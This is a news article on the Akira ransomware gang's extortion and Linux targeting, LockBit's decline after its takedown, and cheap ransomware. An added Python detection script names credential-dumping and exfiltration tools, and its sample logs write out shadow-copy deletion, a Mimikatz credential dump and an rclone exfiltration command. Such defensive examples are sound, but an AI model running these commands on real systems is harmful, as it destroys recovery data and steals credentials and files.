Akira Ransomware Gang Extorts $42 Million; It now targets Linux servers

Akira ransomware

Threat actors behind the Akira ransomware group have extorted approximately $42 million in illicit proceeds after breaching the networks of more than 250 victims as of January 1, 2024.

“Since March 2023, the Akira ransomware has impacted a wide range of businesses and critical infrastructure entities across North America, Europe and Australia,” cybersecurity agencies from the Netherlands and the United States, together with Europol’s European Cybercrime Center (EC3), said in a joint alert.

“In April 2023, after initially focusing on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines.”

The double-extortion group was observed using a C++ variant of the locker in its early stages before switching to Rust-based code in August 2023. It is worth noting that this e-crime actor is entirely distinct from the Akira ransomware family that was active in 2017.

Initial access to target networks is gained by exploiting known flaws in Cisco appliances (e.g., CVE-2020-3259 and CVE-2023-20269).

Alternative vectors include Remote Desktop Protocol (RDP), spear-phishing, valid credentials, and virtual private network (VPN) services that lack multi-factor authentication (MFA).


Akira actors are also known to establish persistence by creating a new domain account on the compromised system, and to evade detection by abusing the Zemana AntiMalware driver to terminate antivirus-related processes in what is known as a Bring Your Own Vulnerable Driver (BYOVD) attack.

To aid privilege escalation, the attackers rely on credential-scraping tools such as Mimikatz and LaZagne, while Windows RDP is used to move laterally within the victim’s network. Data exfiltration is performed with FileZilla, WinRAR, WinSCP and RClone.

“Akira ransomware encrypts targeted systems using a hybrid encryption algorithm that combines Chacha20 and RSA,” Trend Micro said in an analysis of the ransomware published in October 2023.

“Additionally, the Akira ransomware binary, like most modern ransomware binaries, has a feature that allows it to inhibit system recovery by deleting shadow copies from the affected system.”
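The persistence, BYOVD, credential-theft, exfiltration and shadow-copy-deletion behaviours described above all leave recognisable traces in Windows process-creation and security telemetry. As an added illustration (not code from the article, the agencies’ advisory, or any vendor), the script below runs a handful of simple detection rules over constructed sample log lines. The log lines are made up for this example, and the Zemana driver file names (zam64.sys, zamguard64.sys) are assumed, since the article names the product but not the driver files.

```python
"""Added example (not from the article or any vendor's code): a minimal
detector for several Akira TTPs described above, run over constructed log lines.

Each rule is a compiled regex applied to one log line. The sample lines are
constructed for this example, not real telemetry. The Zemana driver file names
(zam64.sys, zamguard64.sys) are an assumption; the article names only the product.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str            # short label for the TTP the rule covers
    pattern: re.Pattern  # compiled regex evaluated against each log line


RULES = [
    # Persistence: a new user account created (Windows Security Event ID 4720)
    Rule("persistence_new_account", re.compile(r"\bEventID=4720\b")),
    # Defense evasion (BYOVD): Zemana AntiMalware driver installed as a service
    Rule("byovd_zemana_driver",
         re.compile(r"\b(zam64|zamguard64)\.sys\b", re.IGNORECASE)),
    # Credential access: Mimikatz or LaZagne on a command line
    Rule("cred_dump_tool",
         re.compile(r"\b(mimikatz|lazagne)(\.exe)?\b", re.IGNORECASE)),
    # Inhibit recovery: shadow copy deletion via vssadmin or wmic
    Rule("shadow_copy_deletion",
         re.compile(r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)",
                    re.IGNORECASE)),
    # Exfiltration: rclone / WinSCP / FileZilla launched
    Rule("exfil_tool",
         re.compile(r"\b(rclone|winscp|filezilla)(\.exe)?\b", re.IGNORECASE)),
]


def match_line(line: str) -> list[str]:
    """Return the names of all rules that fire on a single log line."""
    return [r.name for r in RULES if r.pattern.search(line)]


def scan(lines) -> dict[str, list[int]]:
    """Map each rule that fired to the 1-based indices of the lines it matched."""
    hits: dict[str, list[int]] = {}
    for idx, line in enumerate(lines, start=1):
        for name in match_line(line):
            hits.setdefault(name, []).append(idx)
    return hits


# Constructed sample telemetry (Security 4720/4688 and System 7045 events), one per line.
SAMPLE_LOGS = [
    "2024-03-02T01:10:05Z host=DC01 EventID=4720 TargetUserName=svc_backup2 SubjectUserName=admin",
    "2024-03-02T01:12:41Z host=WS17 EventID=4688 NewProcessName=C:\\Windows\\System32\\svchost.exe",
    "2024-03-02T01:15:09Z host=WS17 EventID=7045 ServiceName=ZAM ImagePath=C:\\Users\\Public\\zamguard64.sys",
    "2024-03-02T01:16:30Z host=WS17 EventID=4688 CommandLine=\"C:\\tmp\\mimikatz.exe\" privilege::debug sekurlsa::logonpasswords",
    "2024-03-02T01:20:11Z host=FS02 EventID=4688 CommandLine=rclone.exe copy D:\\Shares mega:exfil --transfers 8",
    "2024-03-02T01:25:55Z host=FS02 EventID=4688 CommandLine=vssadmin.exe delete shadows /all /quiet",
    "2024-03-02T01:26:02Z host=FS02 EventID=4688 CommandLine=wmic.exe shadowcopy delete",
]


if __name__ == "__main__":
    for name, matched in scan(SAMPLE_LOGS).items():
        print(f"{name}: lines {matched}")
```

Run stand-alone, the script reports one hit per TTP and two for shadow-copy deletion (the vssadmin and wmic variants). In production these rules would live in a SIEM or as Sigma rules, and the tool-name matches in particular should be paired with parent-process and signing context to keep false positives down; the point here is that each stage the article lists is observable with ordinary Windows event logging.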

Blockchain and source-code data suggest that the Akira ransomware group is likely affiliated with the now-defunct Conti ransomware gang. A decryptor for Akira was released by Avast last July, but the flaws it exploited have very likely been fixed since.


Akira’s pivot to target Linux enterprise environments also follows similar moves by other established ransomware families such as LockBit, Cl0p, Royal, Monti, and RTM Locker.

LockBit struggles to bounce back

The disclosure comes as Trend Micro revealed that law enforcement’s large-scale takedown of the prolific LockBit gang in early February had a significant operational and reputational impact on the group’s ability to recover, prompting it to post old and fake victims on its new data leak site.

“LockBit has been one of the most prolific and widely used RaaS strains around, with potentially hundreds of affiliates, including many associated with other major strains,” Chainalysis noted in February.

The blockchain analytics firm said it had discovered cryptocurrency trails linking a LockBit administrator to a Sevastopol-based journalist known as Colonel Cassad, who has a history of soliciting donations for Russian militia group operations in the sanctioned jurisdictions of Donetsk and Luhansk following the start of the Russo-Ukrainian War in 2022.

It is worth pointing out that Cisco Talos, in January 2022, linked Colonel Cassad (aka Boris Rozhin) to an anti-Ukraine disinformation campaign orchestrated by the Russian state-sponsored group known as APT28.

“Following the operation, LockBitSupp [the alleged leader of LockBit] appears to be attempting to inflate the apparent number of victims, while also focusing on posting victims from countries whose law enforcement agencies participated in the disruption,” Trend Micro said in a recent analysis.


“This is perhaps an attempt to reinforce the narrative that the system would come back stronger and target those responsible for its disruption.”

In an interview with Recorded Future News last month, LockBitSupp acknowledged short-term profit declines but promised to improve its security measures and “work as long as my heart beats.”

“Reputation and trust are key to attracting affiliates, and when these are lost, it is more difficult to convince people to return. The Cronos operation has managed to hit one of the most important elements of its business: its brand,” Trend Micro said.


Agenda returns with an updated Rust variant

The development also follows the Agenda ransomware group (aka Qilin and Water Galura) using an updated Rust variant to infect VMware vCenter and ESXi servers via remote monitoring and management (RMM) tools and Cobalt Strike.

“The Agenda ransomware’s ability to spread to virtual machine infrastructure demonstrates that its operators are also expanding to new targets and systems,” the cybersecurity firm said.


Even as a new crop of ransomware actors continues to energize the threat landscape, it is also becoming increasingly clear that crude, cheap ransomware sold in the cybercrime underground is being used in real-world attacks, allowing individual, lower-tier threat actors to generate significant profits without having to be part of a well-organized group.

Interestingly, most of these variants are available for a one-time price starting at just $20 for a single build, while others such as HardShield and RansomTuga are offered at no cost.

“Far from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to take action cheaply, easily and independently,” Sophos said, describing it as a “relatively new phenomenon” that further reduces the cost of entry.

“They can target small businesses and individuals, who are unlikely to have the resources to defend themselves or respond effectively to incidents, without giving anyone else a cut.”
